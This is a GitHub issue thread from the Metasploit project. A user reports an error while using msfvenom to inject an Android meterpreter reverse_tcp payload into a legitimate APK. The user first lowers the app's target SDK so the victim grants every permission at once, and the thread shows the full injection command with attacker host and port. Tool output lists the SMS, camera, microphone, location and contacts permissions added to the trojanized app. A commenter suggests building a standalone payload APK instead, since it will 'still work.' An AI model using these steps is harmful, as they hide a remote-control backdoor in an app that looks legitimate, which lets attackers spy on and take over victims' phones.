MSFVENOM legit apk targetSdkVersion: '26'

[DenDeze]

Steps to reproduce

How'd you do it?

1. Decompile legit blah.apk with apktool to ~/blah, changed targetSdkVersion: '26' to targetSdkVersion: '22' (trying to ask the user to give all permissions at once).

2. recompiled 'blah' folder back in to blah.apk blah.apk works on an android device with new targetsdkversion.

What should happen?

putting the payload inside the blahnew.apk fails

msfvenom -x ~/blah.apk -p android/meterpreter/reverse_tcp LHOST=192.1.1.1 LPORT=444 -o blahnew.apk

What happens instead?

No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload Error: undefined method `[]' for nil:NilClass

Metasploit version

Framework: 4.16.57-dev Console : 4.16.57-dev

I installed Metasploit with:

• [X] Kali package via apt
• [ ] Omnibus installer (nightly)
• [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
• [ ] Source install (please specify ruby version)

OS

4.15.0-kali3-amd64

[DenDeze]

Decompiled with apktool, compiled again after changing the sdk version. After this step i signed the apk. Now the injection seems to work fine until:

Application.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Rebuilding /home/myhome/test.apk with meterpreter injection as /tmp/d20180523-3982-qp9uar/output.apk
Error: Unable to rebuild apk with apktool

[acidical]

I guess you just have to create an apk file from scratch with msfvenom instead of injecting into a legit one. At least do this until a fix is released. It may be suspicious but it will still work.

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[bcoles]

Two issues were reported. It is unclear what caused these issues. However, this issue is almost 4 years old.

Since then, apktool has had various updates including several bug fixes.

Metasploit's APK parsing was recently updated to provide more useful debug output in instances where (re)building APK files failed. If these issues reoccur, there should now be a more useful error message which can be used to diagnose the root cause.

Closing.